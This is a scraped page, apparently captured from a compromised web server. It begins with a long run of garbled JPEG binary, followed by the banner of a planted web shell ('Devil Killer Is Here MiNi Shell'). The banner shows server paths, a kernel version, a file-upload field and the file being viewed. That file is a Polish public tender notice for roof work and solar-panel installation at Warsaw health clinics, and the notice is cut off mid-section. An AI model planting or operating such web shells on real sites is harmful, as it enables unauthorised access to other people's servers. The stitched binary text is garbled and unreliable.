JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20240826/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20240826/0047170801-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> „Roboty budowlane w zakresie adaptacji dachów oraz montażu OZE - instalacji<br/>paneli fotowoltaicznych wraz z robotami towarzyszącymi, <br/>w czterech lokalizacjach w Warszawie (2)”, </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Samodzielny Zespół Publicznych Zakładów Lecznictwa Otwartego Warszawa-Ochota</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 010202670</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Szczęśliwicka 36</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Warszawa</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">02-353</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL911 - Miasto Warszawa</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia@zpzlo-ochota.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.szpzlo-ochota.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - samodzielny publiczny zakład opieki zdrowotnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Zdrowie</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Roboty budowlane w zakresie adaptacji dachów oraz montażu OZE - instalacji<br/>paneli fotowoltaicznych wraz z robotami towarzyszącymi, <br/>w czterech lokalizacjach w Warszawie (2)”, </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-ed913e5c-e015-4fea-80eb-f861ebcb74a5</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00471708</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-08-26</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00041802/09/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.9 Roboty budowlane w zakresie adaptacji dachów oraz montażu OZE - instalacji paneli fotowoltaicznych wraz z robotami towarzyszącymi, w czterech lokalizacjach w Warszawie (2)</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/transakcja/970298 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/transakcja/970298</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">zgodnie z Rozdziałem XIII SWZ</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Dane osobowe będą przetwarzane na podstawie art. 6 ust. 1 lit. c rozporządzenia<br/>Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016r. w sprawie ochrony osób fizycznych w związku z<br/>przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne<br/>rozporządzenie<br/>o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1, z późn. zm.) (dalej: RODO) w celu związanym z postępowaniem o<br/>udzielenie zamówienia publicznego. Podstawą prawną ich przetwarzania są przepisy ustawy z dnia 11 września 2019r. – Prawo<br/>zamówień publicznych (Dz. U. z 2023r. poz. 1605, z późn. zm.) (dalej: prawo zamówień publicznych), a także ustawa z dnia 14 lipca<br/>1983r. o narodowym zasobie archiwalnym i archiwach (Dz. U. z 2020r. poz. 164, z późn. zm.)<br/>Szczegółowe zapisy znajdują się w Rozdziale XXIII SWZ</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">godnie z dokumentacją postępowania</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP-2511-15-IS/2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia są roboty budowlane, w zakresie adaptacji dachów oraz montażu OZE - instalacji paneli<br/>fotowoltaicznych wraz z robotami towarzyszącymi, w czterech lokalizacjach w Warszawie. 3. Szczegółowy opis przedmiotu<br/>zamówienia, zawarty jest w Załączniku nr 1 do SWZ – Specyfikacji Technicznej Wykonania i Odbioru Robót (STWiOR),<br/>Zalczniku nr 2 do SWZ – przedmiarze robót; Załączniku nr 3 do SWZ – projekcie technicznym; Załączniku nr 5 do SWZ –<br/>projekcie umowy.<br/>UWAGA:<br/>Przedmiar robót ma charakter tylko pomocniczy i nie stanowi podstawy rozliczenia. Zwiększenie ilości pozycji Przedmiaru<br/>robót nie stanowi podstawy do zwiększenia wynagrodzenia. Wykonawca jest zobowiązany do przygotowania oferty według<br/>zweryfikowanych przez siebie wartości.<br/>Ponadto Zamawiający informuje, iż z uwagi na rozmiar (ciężar) dokumentacji technicznej,<br/>tj. Specyfikacji Technicznej Wykonania i Odbioru Robót (STWIOR), stanowiącej Załącznik nr 1 do SWZ; przedmiaru robót<br/>oraz projektu technicznego, ww. dokumentację udostępnia na stronie internetowej pod adresem<br/>http://www.bip.szpzlo-ochota.pl/userfiles/file/bip/komplet_projektow.zip </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45450000-6 - Roboty budowlane wykończeniowe, pozostałe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45315100-9 - Instalacyjne roboty elektrotechniczne</p> <p class="mb-0">45310000-3 - Roboty instalacyjne elektryczne</p> <p class="mb-0">09332000-5 - Instalacje słoneczne</p> <p class="mb-0">09331200-0 - Słoneczne moduły fotoelektryczne</p> <p class="mb-0">51112100-1 - Usługi instalowania sprzętu do przesyłu energii elektrycznej</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">63 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">toku badania i oceny ofert Zamawiający może żądać od Wykonawcy wyjaśnień dotyczących treści<br/>złożonej oferty, w tym zaoferowanej ceny.<br/>1. Cena ofertowa musi uwzględniać wszelkie koszty jakie Wykonawca poniesie w związku<br/>z realizacją przedmiotu zamówienia.<br/>2. Punktacja przyznawana ofertom, w poszczególnych kryteriach oceny ofert, będzie liczona<br/>z dokładnością do dwóch miejsc po przecinku, zgodnie z zasadami arytmetyki.<br/>3. Każda Oferta może otrzymać maksymalnie 100 pkt.<br/>4. Zamawiający udzieli zamówienia Wykonawcy, którego oferta:<br/>1) odpowiada wszystkim wymaganiom przedstawionym w Ustawie,<br/>2) odpowiada wszystkim wymaganiom przedstawionym w SWZ;<br/>3) uzyskała najwyższą ilość punktów, zgodnie z kryterium oceny ofert.<br/>5. W sytuacji, gdy Zamawiający nie będzie mógł dokonać wyboru najkorzystniejszej oferty ze względu na to, że dwie lub więcej ofert<br/>przedstawia taki sam bilans ceny i innych kryteriów oceny ofert, Zamawiający zastosuje procedurę określoną w art. 248 Ustawy.<br/>6. Jeżeli zaoferowana przez Wykonawcę cena, lub jej istotne części składowe, będą wydawały się rażąco niskie w stosunku do<br/>przedmiotu zamówienia lub będą budzić wątpliwości Zamawiającego co do możliwości wykonania przedmiotu zamówienia zgodnie z<br/>wymaganiami określonymi w SWZ, Zamawiający zażąda od Wykonawcy wyjaśnień, w tym złożenia dowodów w zakresie wyliczenia<br/>ceny lub jej istotnych części, zgodnie z art. 224 Ustawy.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">50</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin wykonania</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> dotyczący zdolności technicznej lub zawodowej:<br/>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże iż dysponuje:<br/>a)	przynajmniej jednym kierownikiem budowy, posiadającym uprawnienia budowlane <br/>do kierowania robotami budowlanymi bez ograniczeń w specjalności konstrukcyjno – budowlanej oraz co najmniej 84 miesięczne doświadczenie zawodowe po uzyskaniu uprawnień budowlanych na stanowisku kierownika budowy<br/>oraz<br/>b)	przynajmniej jednym kierownikiem robót elektrycznych, posiadającym uprawnienia budowlane do projektowania bez ograniczeń w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych oraz co najmniej <br/>72 miesięczne doświadczenie zawodowe po uzyskaniu uprawnień budowlanych <br/>na stanowisku kierownika robót branżowych – elektryka. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1)	oświadczenie Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy Pzp, o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (t.j. Dz. U. z 2023 r., poz. 1689), z innym Wykonawcą, który złożył odrębną ofertę, ofertę częściową, albo oświadczenia <br/>o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty lub oferty częściowej niezależnie od innego Wykonawcy należącego do tej samej grupy kapitałowej, stanowiące Załącznik nr 8 do SWZ,<br/>2)	odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 Ustawy, sporządzonych nie wcześniej niż 3 (trzy) miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji.<br/>3) Oświadczenie, zgodnie z Załącznikiem nr 6 do SWZ, w formie elektronicznej, opatrzone kwalifikowanym podpisem elektronicznym lub w postaci elektronicznej opatrzonej podpisem zaufanym albo podpisem osobistym, obejmujący oświadczenie Wykonawcy <br/>o spełnianiu warunków udziału w Postępowaniu, braku podstaw do wykluczenia.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1. Oświadczenie, zgodnie z Załącznikiem nr 6 do SWZ, w formie elektronicznej, opatrzone kwalifikowanym podpisem elektronicznym lub w postaci elektronicznej opatrzonej podpisem zaufanym albo podpisem osobistym, obejmujący oświadczenie Wykonawcy <br/>o spełnianiu warunków udziału w Postępowaniu, braku podstaw do wykluczenia. <br/><br/>2. Wykaz osób kierowanych przez Wykonawcę do realizacji zamówienia publicznego, spełniających wymagania SWZ wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień <br/>i okresu doświadczenia zawodowego, niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nich czynności i sposobu dysponowania tymi osobami, zgodnego ze wzorem stanowiącym Załącznik nr 7 do SWZ,</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> pełnomocnictwo do składania oświadczeń w imieniu wykonawcy - o ile dotyczy<br/>pełnomocnictwo do reprezentowania konsorcjum - o ile dotyczy <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1.	Zamawiający żąda od Wykonawców wniesienia wadium wysokości 36 000,00 zł (słownie: trzydzieści sześć tysięcy złotych 00/100).<br/>2.	Wadium wnosi się przed upływem terminu składania ofert.<br/>3.	Wadium należy utrzymywać nieprzerwanie do dnia upływu terminu związania ofertą, <br/>z wyjątkiem przypadków, o których mowa w art. 98 ust. 1 pkt 2 i 3 oraz ust. 2 Ustawy.<br/>4.	Wadium może być wnoszone według wyboru Wykonawcy w jednej lub w kilku następujących formach:<br/>1)	pieniądzu;<br/>2)	gwarancjach bankowych;<br/>3)	gwarancjach ubezpieczeniowych;<br/>4)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 <br/>pkt 2 ustawy z dnia 09 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2023 r. poz. 462).<br/>5.	Wadium uznaje się za wniesione w terminie, gdy:<br/>1)	wnoszone w formie pieniądza zostało uznane na rachunku bankowym Zamawiającego przed upływem terminu składania ofert;<br/>2)	wnoszone w formach innych niż pieniądz – Wykonawca zamieści bezpośrednio na stronie internetowej prowadzonego Postępowania pod adresem: <br/>https://platformazakupowa.pl/transakcja/970298 , <br/>w formie elektronicznej oryginał dokumentu wadialnego, opatrzony kwalifikowanym podpisem elektronicznym osób upoważnionych do jego wystawienia tj. wystawcę dokumentu, potwierdzającego wniesienie wadium, nie później niż przed upływem terminu składania ofert.<br/>6.	Wadium wnoszone w pieniądzu wpłaca się przelewem na poniżej wskazany rachunek bankowy Zamawiającego:<br/>22 1240 5918 1111 0000 4907 6679 (w PKO S.A.).<br/>7.	Wadium wniesione w pieniądzu Zamawiający przechowuje na rachunku bankowym.<br/>8.	Wadium wnoszone w formach innych niż pieniądz:<br/>1)	musi obejmować wszystkie przesłanki zatrzymania wadium określone w art. 98 ust. 6 Ustawy;<br/>2)	musi zawierać stwierdzenie, że gwarant lub poręczyciel zobowiązuje się nieodwołalnie <br/>i bezwarunkowo pokryć wszelkie zobowiązania Wykonawcy wobec Zamawiającego wynikające z zapisów SWZ dotyczące wadium, do wysokości gwarantowanej kwoty, <br/>na pierwsze żądanie Zamawiającego przedstawione gwarantowi w formie pisemnej;<br/>3)	musi wskazywać nazwę i numer Postępowania;<br/>4)	nie może wprowadzać żadnych dodatkowych warunków, od spełnienia których zależy spełnienie świadczeń z tytułu udzielonej gwarancji lub poręczenia.<br/>9.	Wadium wnoszone w innych niż w pieniądzu, dopuszczonych przez Zamawiającego formach, Wykonawca składa w formie elektronicznej za pośrednictwem Platformy Zakupowej, o której mowa w Rozdziale X i dalszych SWZ, pod adresem:<br/>https://platformazakupowa.pl/transakcja/970298 , poprzez wczytanie oryginału dokumentu wadialnego, tj. opatrzonego kwalifikowanym podpisem elektronicznym osób upoważnionych do jego wystawienia.<br/>10.	Zamawiający wymaga, aby wadium wniesione w formie innej niż pieniądz podpisane było kwalifikowanym podpisem elektronicznym przez gwaranta tj. wystawcę gwarancji / poręczenia. <br/>11.	Wadium złożone w pieniądzu Zamawiający zwróci wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez Wykonawcę. Wadium złożone w formie innej niż pieniężna Zamawiający zwróci poprzez złożenie gwarantowi lub poręczycielowi oświadczenia o zwolnieniu wadium.<br/>12.	Jeżeli wadium nie zostanie wniesione lub zostanie wniesione w sposób nieprawidłowy, Zamawiający odrzuci ofertę Wykonawcy, zgodnie z art. 226 ust. 1 pkt 14 Ustawy. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	W przypadku składania oferty wspólnej, tj. oferty Wykonawców wspólnie ubiegających się <br/>o udzielenie zamówienia, zgodnie z art. 58 ust. 2 Ustawy, do oferty należy dołączyć pełnomocnictwo, podpisane przez wszystkich partnerów, ustanawiające pełnomocnika Wykonawców do reprezentowania ich w Postępowaniu albo do reprezentowania <br/>w Postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>2.	Zamawiający, przed zawarciem umowy w sprawie zamówienia publicznego, będzie żądał umowy regulującej współpracę tych Wykonawców. Umowa, o której mowa w zdaniu poprzedzającym, nie może być zawarta na okres krótszy niż termin realizacji zamówienia. Podmioty występujące wspólnie ponoszą solidarną odpowiedzialność za niewykonanie lub nienależyte wykonanie zobowiązań.<br/>3.	Podmioty występujące wspólnie, ponoszą solidarną odpowiedzialność za należyte wykonanie Umowy.<br/>4.	W przypadku, gdy Wykonawcą będzie więcej niż jeden podmiot, wynagrodzenie należne Wykonawcy, wpłacane będzie na konto podmiotu zwanego „Liderem”, wskazanego wspólnie przez podmioty występujące, jako Wykonawca. <br/>5.	Wskazanie Lidera będzie określone w formie pisemnego upoważnienia, stanowiącego załącznik do Umowy, w którym wszystkie podmioty występujące, jako Wykonawca, upoważnią Lidera do dokonywania wszelkich rozliczeń z Zamawiającym oraz wskazania rachunku, na który zapłata ma nastąpić. Wykonawca wyraża zgodę na dokonanie przez Zamawiającego zapłaty wynagrodzenia lub jego części, zgodnie z wystawioną przez Lidera fakturą, na rachunek w niej wskazany oraz oświadcza, iż zapłata dokonana w powyższy sposób, zwalnia Zamawiającego z długu wobec Wykonawcy. <br/>6. W przypadku wyboru oferty złożonej przez Wykonawców wspólnie ubiegających się <br/>o udzielenie zamówienia, Zamawiający zastrzega sobie prawo żądania przed zawarciem umowy w sprawie zamówienia publicznego, umowy regulującej współpracę tych Wykonawców.<br/>- zgodnie z zapisami SWZ <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) 